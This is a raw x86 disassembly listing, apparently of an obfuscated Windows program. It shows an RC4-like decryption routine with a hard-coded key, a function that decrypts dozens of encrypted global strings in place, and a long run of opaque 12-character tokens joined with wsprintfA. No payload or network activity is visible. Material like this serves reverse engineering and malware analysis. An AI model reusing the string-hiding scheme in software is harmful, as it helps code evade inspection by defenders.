var_63 = byte ptr -63h
var_62 = byte ptr -62h
var_61 = byte ptr -61h
var_60 = byte ptr -60h
var_5F = byte ptr -5Fh
var_5E = byte ptr -5Eh
var_5D = byte ptr -5Dh
var_5C = byte ptr -5Ch
var_5B = byte ptr -5Bh
var_5A = byte ptr -5Ah
var_59 = byte ptr -59h
var_58 = byte ptr -58h
var_57 = byte ptr -57h
var_56 = byte ptr -56h
var_55 = byte ptr -55h
var_54 = byte ptr -54h
var_53 = byte ptr -53h
var_52 = byte ptr -52h
var_51 = byte ptr -51h
var_50 = byte ptr -50h
var_4F = byte ptr -4Fh
var_4E = byte ptr -4Eh
var_4D = byte ptr -4Dh
var_4C = byte ptr -4Ch
var_4B = byte ptr -4Bh
var_4A = byte ptr -4Ah
var_49 = byte ptr -49h
var_48 = byte ptr -48h
var_47 = byte ptr -47h
var_46 = byte ptr -46h
var_45 = byte ptr -45h
var_44 = byte ptr -44h
var_43 = byte ptr -43h
var_42 = byte ptr -42h
var_41 = byte ptr -41h
var_40 = byte ptr -40h
var_3F = byte ptr -3Fh
var_3E = byte ptr -3Eh
var_3D = byte ptr -3Dh
var_3C = byte ptr -3Ch
var_3B = byte ptr -3Bh
var_3A = byte ptr -3Ah
var_39 = byte ptr -39h
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_36 = byte ptr -36h
var_35 = byte ptr -35h
var_34 = byte ptr -34h
var_33 = byte ptr -33h
var_32 = byte ptr -32h
var_31 = byte ptr -31h
var_30 = byte ptr -30h
var_2F = byte ptr -2Fh
var_2E = byte ptr -2Eh
var_2D = byte ptr -2Dh
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = byte ptr -2Ah
var_29 = byte ptr -29h
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = byte ptr -26h
var_25 = byte ptr -25h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = byte ptr -22h
var_21 = byte ptr -21h
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_1E = byte ptr -1Eh
var_1D = byte ptr -1Dh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 448h
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov [ebp+var_E8], 0Ah
mov [ebp+var_E7], 0Eh
mov [ebp+var_E6], 20h
mov [ebp+var_E5], 48h
mov [ebp+var_E4], 0Bh
mov [ebp+var_E3], 2Bh
mov [ebp+var_E2], 0Ch
mov [ebp+var_E1], 23h
mov [ebp+var_E0], 3Ah
mov [ebp+var_DF], 27h
mov [ebp+var_DE], 28h
mov [ebp+var_DD], 5Eh
mov [ebp+var_DC], 2Ah
mov [ebp+var_DB], 1Eh
mov [ebp+var_DA], 2Dh
mov [ebp+var_D9], 5Ah
mov [ebp+var_D8], 1Bh
mov [ebp+var_D7], 0Fh
mov [ebp+var_D6], 4Ch
mov [ebp+var_D5], 44h
mov [ebp+var_D4], 16h
mov [ebp+var_D3], 4
mov [ebp+var_D2], 57h
mov [ebp+var_D1], 23h
mov [ebp+var_D0], 11h
mov [ebp+var_CF], 53h
mov [ebp+var_CE], 38h
mov [ebp+var_CD], 13h
mov [ebp+var_CC], 0Dh
mov [ebp+var_CB], 12h
mov [ebp+var_CA], 25h
mov [ebp+var_C9], 1Ch
mov [ebp+var_C8], 30h
mov [ebp+var_C7], 12h
mov [ebp+var_C6], 50h
mov [ebp+var_C5], 4Fh
mov [ebp+var_C4], 39h
mov [ebp+var_C3], 10h
mov [ebp+var_C2], 42h
mov [ebp+var_C1], 1Fh
mov [ebp+var_C0], 37h
mov [ebp+var_BF], 1Dh
mov [ebp+var_BE], 41h
mov [ebp+var_BD], 55h
mov [ebp+var_BC], 2Ch
mov [ebp+var_BB], 41h
mov [ebp+var_BA], 2Ch
mov [ebp+var_B9], 4Eh
mov [ebp+var_B8], 5Dh
mov [ebp+var_B7], 17h
mov [ebp+var_B6], 5Bh
mov [ebp+var_B5], 1Ch
mov [ebp+var_B4], 44h
mov [ebp+var_B3], 1Dh
mov [ebp+var_B2], 25h
mov [ebp+var_B1], 22h
mov [ebp+var_B0], 2Fh
mov [ebp+var_AF], 2Bh
mov [ebp+var_AE], 58h
mov [ebp+var_AD], 2Eh
mov [ebp+var_AC], 16h
mov [ebp+var_AB], 41h
mov [ebp+var_AA], 13h
mov [ebp+var_A9], 30h
mov [ebp+var_A8], 59h
mov [ebp+var_A7], 38h
mov [ebp+var_A6], 27h
mov [ebp+var_A5], 35h
mov [ebp+var_A4], 1
mov [ebp+var_A3], 11h
mov [ebp+var_A2], 0Bh
mov [ebp+var_A1], 0Ch
mov [ebp+var_A0], 0Dh
mov [ebp+var_9F], 43h
mov [ebp+var_9E], 45h
mov [ebp+var_9D], 19h
mov [ebp+var_9C], 13h
mov [ebp+var_9B], 22h
mov [ebp+var_9A], 39h
mov [ebp+var_99], 45h
mov [ebp+var_98], 41h
mov [ebp+var_97], 14h
mov [ebp+var_96], 2Eh
mov [ebp+var_95], 3Dh
mov [ebp+var_94], 4Fh
mov [ebp+var_93], 13h
mov [ebp+var_92], 1Fh
mov [ebp+var_91], 33h
mov [ebp+var_90], 31h
mov [ebp+var_8F], 0Ah
mov [ebp+var_8E], 43h
mov [ebp+var_8D], 47h
mov [ebp+var_8C], 27h
mov [ebp+var_8B], 55h
mov [ebp+var_8A], 38h
mov [ebp+var_89], 49h
mov [ebp+var_88], 2Ah
mov [ebp+var_87], 0Bh
mov [ebp+var_86], 4Eh
mov [ebp+var_85], 41h
mov [ebp+var_84], 33h
mov [ebp+var_83], 4Ch
mov [ebp+var_82], 10h
mov [ebp+var_81], 4Eh
mov [ebp+var_80], 36h
mov [ebp+var_7F], 34h
mov [ebp+var_7E], 5Ah
mov [ebp+var_7D], 2Dh
mov [ebp+var_7C], 5Ah
mov [ebp+var_7B], 12h
mov [ebp+var_7A], 0Bh
mov [ebp+var_79], 2Bh
mov [ebp+var_78], 13h
mov [ebp+var_77], 0Dh
mov [ebp+var_76], 15h
mov [ebp+var_75], 21h
mov [ebp+var_74], 0Bh
mov [ebp+var_73], 3
mov [ebp+var_72], 4Ch
mov [ebp+var_71], 17h
mov [ebp+var_70], 4Ch
mov [ebp+var_6F], 49h
mov [ebp+var_6E], 38h
mov [ebp+var_6D], 0Dh
mov [ebp+var_6C], 18h
mov [ebp+var_6B], 1Dh
mov [ebp+var_6A], 3Ch
mov [ebp+var_69], 27h
mov [ebp+var_68], 23h
mov [ebp+var_67], 59h
mov [ebp+var_66], 1Eh
mov [ebp+var_65], 43h
mov [ebp+var_64], 5Fh
mov [ebp+var_63], 4Eh
mov [ebp+var_62], 14h
mov [ebp+var_61], 2Bh
mov [ebp+var_60], 4Dh
mov [ebp+var_5F], 27h
mov [ebp+var_5E], 2Dh
mov [ebp+var_5D], 22h
mov [ebp+var_5C], 0Ch
mov [ebp+var_5B], 30h
mov [ebp+var_5A], 0Dh
mov [ebp+var_59], 20h
mov [ebp+var_58], 16h
mov [ebp+var_57], 1Ch
mov [ebp+var_56], 2Ch
mov [ebp+var_55], 15h
mov [ebp+var_54], 2Ch
mov [ebp+var_53], 12h
mov [ebp+var_52], 4Fh
mov [ebp+var_51], 0Ah
mov [ebp+var_50], 38h
mov [ebp+var_4F], 2Dh
mov [ebp+var_4E], 49h
mov [ebp+var_4D], 15h
mov [ebp+var_4C], 59h
lea eax, [ebp+var_E8]
mov [ebp+var_4B], 38h
push eax
mov [ebp+var_4A], 43h
mov [ebp+var_49], 1Fh
mov [ebp+var_48], 33h
mov [ebp+var_47], 0Dh
mov [ebp+var_46], 38h
mov [ebp+var_45], 2Fh
mov [ebp+var_44], 20h
mov [ebp+var_43], 15h
mov [ebp+var_42], 2Eh
mov [ebp+var_41], 5Bh
mov [ebp+var_40], 36h
mov [ebp+var_3F], 37h
mov [ebp+var_3E], 1Bh
mov [ebp+var_3D], 56h
mov [ebp+var_3C], 4Eh
mov [ebp+var_3B], 32h
mov [ebp+var_3A], 0Ah
mov [ebp+var_39], 48h
mov [ebp+var_38], 42h
mov [ebp+var_37], 45h
mov [ebp+var_36], 2Bh
mov [ebp+var_35], 41h
mov [ebp+var_34], 37h
mov [ebp+var_33], 0Dh
mov [ebp+var_32], 31h
mov [ebp+var_31], 3Dh
mov [ebp+var_30], 4Dh
mov [ebp+var_2F], 17h
mov [ebp+var_2E], 17h
mov [ebp+var_2D], 39h
mov [ebp+var_2C], 21h
mov [ebp+var_2B], 22h
mov [ebp+var_2A], 35h
mov [ebp+var_29], 2Bh
mov [ebp+var_28], 0Bh
mov [ebp+var_27], 2Dh
mov [ebp+var_26], 40h
mov [ebp+var_25], 27h
mov [ebp+var_24], 27h
mov [ebp+var_23], 36h
mov [ebp+var_22], 4Dh
mov [ebp+var_21], 46h
mov [ebp+var_20], 45h
mov [ebp+var_1F], 42h
mov [ebp+var_1E], 13h
mov [ebp+var_1D], 32h
mov [ebp+var_1C], 47h
mov [ebp+var_1B], 4Ch
mov [ebp+var_1A], 17h
mov [ebp+var_19], 23h
mov [ebp+var_18], 1Fh
mov [ebp+var_17], 57h
mov [ebp+var_16], 1Eh
mov [ebp+var_15], 1Dh
mov [ebp+var_14], 2Bh
mov [ebp+var_13], 5Dh
mov [ebp+var_12], 4Eh
mov [ebp+var_11], bl
call sub_422120
mov esi, 1AFh
mov [ebp+var_C], eax
push esi
lea eax, [ebp+var_298]
push ebx
push eax
call sub_4221F0
push esi
lea eax, [ebp+var_448]
push ebx
push eax
call sub_4221F0
add esp, 1Ch
xor eax, eax
dec esi
loc_41D3BE: ; CODE XREF: sub_41CEE1+4E7�j
mov [ebp+eax+var_298], al
inc eax
cmp eax, esi
jb short loc_41D3BE
xor eax, eax
loc_41D3CC: ; CODE XREF: sub_41CEE1+504�j
cmp edi, [ebp+var_C]
jnz short loc_41D3D3
xor edi, edi
loc_41D3D3: ; CODE XREF: sub_41CEE1+4EE�j
mov cl, [ebp+edi+var_E8]
inc edi
mov [ebp+eax+var_448], cl
inc eax
cmp eax, esi
jb short loc_41D3CC
xor edx, edx
mov [ebp+var_8], ebx
loc_41D3EC: ; CODE XREF: sub_41CEE1+545�j
mov ecx, [ebp+var_8]
lea edi, [ebp+ecx+var_298]
movzx ecx, [ebp+ecx+var_448]
mov al, [edi]
add edx, ecx
mov [ebp+var_1], al
mov ecx, esi
movzx eax, al
add eax, edx
xor edx, edx
div ecx
inc [ebp+var_8]
cmp [ebp+var_8], esi
lea eax, [ebp+edx+var_298]
mov cl, [eax]
mov [edi], cl
mov cl, [ebp+var_1]
mov [eax], cl
jb short loc_41D3EC
xor eax, eax
cmp [ebp+arg_4], ebx
mov [ebp+var_C], ebx
mov [ebp+var_10], ebx
jbe short loc_41D494
jmp short loc_41D43A
; ---------------------------------------------------------------------------
loc_41D437: ; CODE XREF: sub_41CEE1+5B1�j
mov eax, [ebp+var_8]
loc_41D43A: ; CODE XREF: sub_41CEE1+554�j
inc eax
xor edx, edx
mov ecx, esi
mov edi, esi
div ecx
mov [ebp+var_8], edx
lea ecx, [ebp+edx+var_298]
xor edx, edx
mov bl, [ecx]
movzx eax, bl
add eax, [ebp+var_C]
div edi
mov [ebp+var_C], edx
lea eax, [ebp+edx+var_298]
mov dl, [eax]
mov [ecx], dl
mov edx, [ebp+var_10]
mov [eax], bl
mov eax, [ebp+arg_0]
lea edi, [edx+eax]
xor edx, edx
movzx eax, byte ptr [ecx]
movzx ecx, bl
add eax, ecx
mov ecx, esi
div ecx
mov al, [ebp+edx+var_298]
xor [edi], al
inc [ebp+var_10]
mov eax, [ebp+var_10]
cmp eax, [ebp+arg_4]
jb short loc_41D437
loc_41D494: ; CODE XREF: sub_41CEE1+552�j
pop edi
pop esi
pop ebx
leave
retn
sub_41CEE1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D499 proc near ; CODE XREF: sub_4120E9+36�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
xor esi, esi
push edi
push esi
mov edi, offset dword_439134
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset byte_439233
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset dword_439540
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset dword_439568
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset dword_439578
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset dword_439590
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset dword_439068
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset dword_439098
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset dword_4390C8
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset loc_439030
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset loc_43903C
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset loc_4395A0
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset dword_4395C4
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset dword_4395E8
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
xor edi, edi
cmp [ebp+arg_0], esi
jle short loc_41D61A
loc_41D5F8: ; CODE XREF: sub_41D499+17F�j
lea ebx, ds:43904Ch[edi*4]
push esi
push esi
push dword ptr [ebx]
call sub_422120
pop ecx
push eax
push dword ptr [ebx]
call sub_41CEE1
add esp, 10h
inc edi
cmp edi, [ebp+arg_0]
jl short loc_41D5F8
loc_41D61A: ; CODE XREF: sub_41D499+15D�j
mov eax, [ebp+arg_4]
cmp eax, esi
jle short loc_41D660
mov edi, offset byte_4396F7
mov [ebp+arg_0], eax
loc_41D629: ; CODE XREF: sub_41D499+1C5�j
lea ebx, [edi-9Fh]
push esi
push esi
push ebx
call sub_422120
pop ecx
push eax
push ebx
call sub_41CEE1
add esp, 10h
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
add edi, 0B8h
dec [ebp+arg_0]
jnz short loc_41D629
loc_41D660: ; CODE XREF: sub_41D499+186�j
push esi
mov edi, offset dword_439638
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset dword_43963C
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset byte_455608
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset byte_455609
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset dword_439644
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset dword_439648
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push offset dword_43964C
call sub_41CEE1
add esp, 10h
mov edi, offset dword_439650
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
push esi
push esi
mov edi, offset dword_43B03C
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset byte_43B13B
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset dword_43B44C
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset off_43B54B
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset dword_43B85C
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset byte_43B95B
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, (offset loc_439027+1)
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, (offset loc_439043+1)
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset aIQ ; "(I]q"
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset aRa ; "=RA"
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset aTa ; "=TA"
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset aZ ; "=Z\\"
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset a8hj ; "8HJ"
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset aTf ; "'TF"
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset aZ_0 ; "=Z]"
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset dword_43C078
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset dword_43C080
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset dword_43C088
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset dword_43C090
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset dword_43C098
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset dword_43C0A0
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
mov edi, offset dword_43C0A8
push esi
push esi
push edi
call sub_422120
pop ecx
push eax
push edi
call sub_41CEE1
add esp, 10h
push esi
push esi
mov esi, offset dword_43C0B0
push esi
call sub_422120
pop ecx
push eax
push esi
call sub_41CEE1
add esp, 10h
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41D499 endp
; =============== S U B R O U T I N E =======================================
sub_41D94C proc near ; CODE XREF: sub_419B2F+35�p
; sub_419F6A+C9�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
test eax, eax
jz short loc_41D988
mov esi, [esp+4+arg_4]
test esi, esi
jz short loc_41D988
cmp byte ptr [eax], 0
jz short loc_41D988
cmp byte ptr [esi], 0
jz short loc_41D988
push edi
push esi
push eax
call sub_41E8CB
mov edi, eax
push edi
push offset aS_1 ; "%s"
push esi
call dword_42F24C ; wsprintfA
push edi
call sub_421C78
add esp, 18h
pop edi
loc_41D988: ; CODE XREF: sub_41D94C+7�j
; sub_41D94C+F�j ...
pop esi
retn
sub_41D94C endp
; =============== S U B R O U T I N E =======================================
sub_41D98A proc near ; CODE XREF: sub_4120E9+3D�p
push esi
mov esi, offset dword_4395E8
push offset aDJstMfgyq_ ; "d/Jst/MFgyQ."
push esi
call sub_41D94C
push offset aErwc30qfw_p0 ; "eRWc30Qfw.P0"
push esi
call sub_41D94C
push offset a86tb1fspjg0 ; "86tb/1FSpjg0"
push esi
call sub_41D94C
push offset aPlsymAee6v1 ; "PlsYM/aEe6v1"
push esi
call sub_41D94C
push offset aC7rq4Xpvel_ ; "c7RQ4/xPvel."
push esi
call sub_41D94C
push offset aOb4iqKj5ue_ ; "Ob4iQ/KJ5ue."
push esi
call sub_41D94C
push offset aNfknl0nqigy0 ; "NFKNL0nQigY0"
push esi
call sub_41D94C
push offset aE0idd0rdw2u ; "e0idD0RDw2U/"
push esi
call sub_41D94C
add esp, 40h
push offset aS3dyJzo6r ; "s3dY//JZo6r/"
push esi
call sub_41D94C
push offset aPdazx1odsoh0 ; "PDazX1oDSOh0"
push esi
call sub_41D94C
push offset aUc6wg1ovwvt1 ; "uc6Wg1OvWVt1"
push esi
call sub_41D94C
push offset aDj9owUmrbd_ ; "dJ9OW/uMRBD."
push esi
call sub_41D94C
push offset aP00ls0k4t_n1 ; "P00Ls0K4t.N1"
push esi
call sub_41D94C
push offset aL3nyw_d7tfl_ ; "l3nYW.D7Tfl."
push esi
call sub_41D94C
push offset aVsz2xXqjp5 ; "Vsz2x/xqJP5/"
push esi
call sub_41D94C
push offset aPnb_aBfzu60 ; "pNb.a/Bfzu60"
push esi
call sub_41D94C
add esp, 40h
push offset aQbwgd0cfxf_ ; "qbwGd0CFxf./"
push esi
call sub_41D94C
push offset a2mo7g0_b0qj ; "2mo7G0.B0qj/"
push esi
call sub_41D94C
push offset a1ylid_ejqp01 ; "1YLId.eJQP01"
push esi
call sub_41D94C
push offset a47ff020f_0_ ; "47Ff/020f.0."
push esi
call sub_41D94C
push offset aHyomeIovtv_ ; "HyOMe/iovtV."
push esi
call sub_41D94C
push offset aPlsymAee6v1_0 ; "PlsYM/aEe6v1"
push esi
call sub_41D94C
push offset aCwxyh0ryouv1 ; "CwXYh0RYoUv1"
push esi
call sub_41D94C
push offset aEavyh_ic0dc0 ; "eAvYh.IC0dc0"
push esi
call sub_41D94C
add esp, 40h
push offset aN1_5f0do0oh_ ; "N1.5f0Do0oH."
push esi
call sub_41D94C
push offset aUz3rf_vtkug1 ; "uz3rf.VTKug1"
push esi
call sub_41D94C
push offset aI3ncg_v5u4g_ ; "I3nCG.v5U4g."
push esi
call sub_41D94C
push offset a9bwj__lz2my0 ; "9bWj..lZ2My0"
push esi
call sub_41D94C
push offset aRiocl1kztwo0 ; "rioCl1kzTWO0"
push esi
call sub_41D94C
push offset a_swwg1hqeii1 ; ".SWwg1hqeiI1"
push esi
call sub_41D94C
push offset aG3obv_r6j7h ; "g3obv.r6j7H/"
push esi
call sub_41D94C
push offset aM5spx_qp7lx_ ; "M5sPX.Qp7Lx."
push esi
call sub_41D94C
add esp, 40h
push offset aF9ax112067l1 ; "f9aX112067l1"
push esi
call sub_41D94C
push offset a_hioo_5pweu_ ; ".HiOo.5pwEU."
push esi
call sub_41D94C
push offset aAjttz06ztse1 ; "ajTtz06Ztse1"
push esi
call sub_41D94C
push offset aUn3hk0sn58o ; "uN3hk0sn58o/"
push esi
call sub_41D94C
push offset aQrn4z10ge1i1 ; "QRn4z10ge1I1"
push esi
call sub_41D94C
push offset aBvuso0ed3mw ; "bVUSO0ed3MW/"
push esi
call sub_41D94C
push offset a6x2ka0buubb_ ; "6x2Ka0buUbB."
push esi
call sub_41D94C
push offset aTvjro1ubgtg1 ; "TVJrO1uBGtg1"
push esi
call sub_41D94C
add esp, 40h
push offset aL80reUvcue1 ; "l80re/UvCUe1"
push esi
call sub_41D94C
push offset aH1cmq0wqw5c_ ; "h1cMQ0wQw5C."
push esi
call sub_41D94C
push offset a7tmte_meccn ; "7Tmte.MEccn/"
push esi
call sub_41D94C
push offset aWn7_tNza2v ; "wN7.t/nZA2V/"
push esi
call sub_41D94C
push offset aGkyv90skypy ; "gkYv90Skypy/"
push esi
call sub_41D94C
push offset aX2yn5_2imz1 ; "X2yN5/.2ImZ1"
push esi
call sub_41D94C
push offset aNPbw1sdkiw_ ; "N/pbW1sDKiw."
push esi
call sub_41D94C
push offset aFdxpb0leh21_ ; "fDxPB0lEh21."
push esi
call sub_41D94C
add esp, 40h
push offset aVb1r0N_arr0 ; "vB1r0/N.Arr0"
push esi
call sub_41D94C
push offset aUts3o_rfmks_ ; "uts3o.RfmkS."
push esi
call sub_41D94C
push offset aBpyvp_fw0vy1 ; "bPYVP.Fw0vY1"
push esi
call sub_41D94C
push offset aQxqog1goyq80 ; "QXqOg1gOYq80"
push esi
call sub_41D94C
push offset aVxa_uCdd7s0 ; "VXA.u/cDD7S0"
push esi
call sub_41D94C
push offset aQc9zs1zgzff0 ; "Qc9zS1zGZff0"
push esi
call sub_41D94C
push offset aWpuwr_6yfru ; "WpuWr.6YFRU/"
push esi
call sub_41D94C
push offset a4rmbzFcic21 ; "4RmBz/FCic21"
push esi
call sub_41D94C
add esp, 40h
push offset aSc_coSwlk_ ; "SC.Co/swLK/."
push esi
call sub_41D94C
push offset aWyf3k1fthkz_ ; "WyF3K1fTHKz."
push esi
call sub_41D94C
push offset aCwxsh_xflvu_ ; "cwXsH.xFlvu."
push esi
call sub_41D94C
push offset aKxor8_os17a0 ; "KxOR8.oS17a0"
push esi
call sub_41D94C
push offset aSasd20nmhk50 ; "sAsD20NmhK50"
push esi
call sub_41D94C
push offset aHpmch0pbq800 ; "HPmCH0PbQ800"
push esi
call sub_41D94C
push offset aLees11vpbnf0 ; "LeEs11vPbnf0"
push esi
call sub_41D94C
push offset aLbjvg0r_qmb_ ; "lbJVg0r.qMb."
push esi
call sub_41D94C
add esp, 40h
push offset aHj6vo0jrp9q0 ; "Hj6vo0JRP9Q0"
push esi
call sub_41D94C
push offset aR7wrsQhek_0 ; "r7WRs/qHek.0"
push esi
call sub_41D94C
push offset aDuzcb0kgssv0 ; "DuzCb0KgSsv0"
push esi
call sub_41D94C
push offset aDqjso_47pdb ; "dQJSO.47pdb/"
push esi
call sub_41D94C
push offset aK9vUKkutm ; "K9V/U/KkuTM/"
push esi
call sub_41D94C
push offset a7yfnz0pw11s1 ; "7yfnz0PW11s1"
push esi
call sub_41D94C
push offset aNq_as1z1sit ; "nQ.As1Z1SIt/"
push esi
call sub_41D94C
push offset aUn3hk0sn58o_0 ; "uN3hk0sn58o/"
push esi
call sub_41D94C
add esp, 40h
push offset aQrn4z10ge1i1_0 ; "QRn4z10ge1I1"
push esi
call sub_41D94C
push offset aIegud0v_5_ ; "iEguD0V/.5/."
push esi
call sub_41D94C
push offset aFc9kk1jx11g_ ; "fc9Kk1jX11G."
push esi
call sub_41D94C
push offset aDnjq8Ze3zw ; "DnjQ8/ze3ZW/"
push esi
call sub_41D94C
push offset aVi0qa1mvfro1 ; "VI0QA1mvfro1"
push esi
call sub_41D94C
push offset aJdzdp05e7aw_ ; "jdZDp05E7aW."
push esi
call sub_41D94C
push offset aW3gp6_13acy1 ; "W3GP6.13AcY1"
push esi
call sub_41D94C
push offset aZat3j_lm3ge1 ; "zAT3J.lm3Ge1"
push esi
call sub_41D94C
add esp, 40h
push offset aLjAmKzrtp1 ; "lJ/am/kZRtP1"
push esi
call sub_41D94C
push offset aXzaru0amxhi_ ; "XZArU0aMxhi."
push esi
call sub_41D94C
push offset aRa7e2Hhxpf0 ; "rA7E2/hHXPf0"
push esi
call sub_41D94C
push offset aRp4sr11cvr1 ; "Rp4sR11CvR1/"
push esi
call sub_41D94C
push offset aZqrvt0t6nmz_ ; "ZqrVt0t6nmZ."
push esi
call sub_41D94C
push offset a1shta0bzfwk1 ; "1ShtA0bzFwk1"
push esi
call sub_41D94C
push offset aAzcsp_hkilo_ ; "AZcsP.hkiLO."
push esi
call sub_41D94C
push offset aIkgekKykjq1 ; "iKgEK/kyKJQ1"
push esi
call sub_41D94C
add esp, 40h
push offset a6x7zf1eztny_ ; "6x7zf1EztnY."
push esi
call sub_41D94C
push offset a7otcu0fic6v0 ; "7otcU0FiC6V0"
push esi
call sub_41D94C
push offset aMb05gVyf8f1 ; "mb05g/VYf8f1"
push esi
call sub_41D94C
push offset aFyflu0ji3xh_ ; "FyFlU0jI3XH."
push esi
call sub_41D94C
push offset aSbsip_o7v4b ; "SbsIp.o7V4B/"
push esi
call sub_41D94C
push offset aN3saa1expwu1 ; "n3sAa1exPWU1"
push esi
call sub_41D94C
push offset aBurnP75wk ; "/BURN/P75Wk/"
push esi
call sub_41D94C
push offset aXkg84_cesgs_ ; "XkG84.cESgs."
push esi
call sub_41D94C
add esp, 40h
push offset aPsern1aagh6_ ; "pSern1AAGh6."
push esi
call sub_41D94C
push offset aUyfog_dvvny0 ; "UyfOG.DvVnY0"
push esi
call sub_41D94C
push offset aP06vqBfbmo_ ; "p06vq/BFBMo."
push esi
call sub_41D94C
push offset a3vvsv1vurua ; "3VVsV1VuRUA/"
push esi
call sub_41D94C
push offset a2onvg1wfjmb1 ; "2ONVG1WFjmb1"
push esi
call sub_41D94C
push offset aZqhijZaeza_ ; "ZqhIJ/ZaEZa."
push esi
call sub_41D94C
push offset aKmdie1uwntq ; "KmdIe1UwntQ/"
push esi
call sub_41D94C
push offset aUpx0wCz2ei0qrn ; "UPx0W/cz2EI0QRn4z10ge1I1"
push esi
call sub_41D94C
add esp, 40h
push offset aV6jbh0k4uD_ ; "V6jBH0k4u/d."
push esi
call sub_41D94C
